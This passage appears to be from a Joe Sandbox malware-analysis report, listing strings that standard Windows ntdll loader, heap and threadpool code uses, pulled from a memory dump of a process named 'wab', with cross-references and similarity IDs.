                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H/# $Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-3246750463
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 0-1745908468
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20269A11, 20269A3A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 20269A01
                                                              • LdrpInitShimEngine, xrefs: 202699F4, 20269A07, 20269A30
                                                              • apphelp.dll, xrefs: 20206496
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 202699ED
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 20269A2A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 202802BD
                                                              • RTL: Re-Waiting, xrefs: 2028031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 202802E7
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: This is located in the %s field of the heap header.$ - `$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 0-2877493756
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-3570731704
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20248421
                                                              • @, xrefs: 20248591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2024855E
                                                              • LdrpInitializeProcess, xrefs: 20248422
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 20270FE5
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 20271028
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2027106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 202710AE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 0-2586055223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 2027A9A2
                                                              • apphelp.dll, xrefs: 20232462
                                                              • LdrpDynamicShimModule, xrefs: 2027A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2027A992
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 0-1391187441
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$E$ $\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 0-1162794518
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $0
                                                              • API String ID: 0-3352262554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 20211728
                                                              • HEAP[%wZ]: , xrefs: 20211712
                                                              • HEAP: , xrefs: 20211596
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                              • API String ID: 0-373624363
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 2027A589
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 2027A59A
                                                              • LdrpCompleteMapModule, xrefs: 2027A590
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                              • API String ID: 0-1151232445
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 202CC1C5
                                                              • PreferredUILanguages, xrefs: 202CC212
                                                              • @, xrefs: 202CC1F1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • SXS: %s() passed the empty activation context data, xrefs: 202829FE
                                                              • RtlCreateActivationContext, xrefs: 202829F9
                                                              • Actx , xrefs: 202433AC
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              • API String ID: 0-859632880
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2029B632
                                                              • GlobalFlag, xrefs: 2029B68F
                                                              • @, xrefs: 2029B670
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                              • API String ID: 0-4192008846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 20292104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 202920F3
                                                              • LdrpInitializationFailure, xrefs: 202920FA
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • kLsE, xrefs: 20210540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2021063D
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 2021A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 2021A2FB
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                              • API String ID: 0-118005554
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 20282A90
                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 20282A95
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                              • API String ID: 0-2653619699
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: @[0 @[0
                                                              • API String ID: 0-3070428983
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID: PreferredUILanguages
                                                              • API String ID: 0-1884656846
                                                              Uniqueness

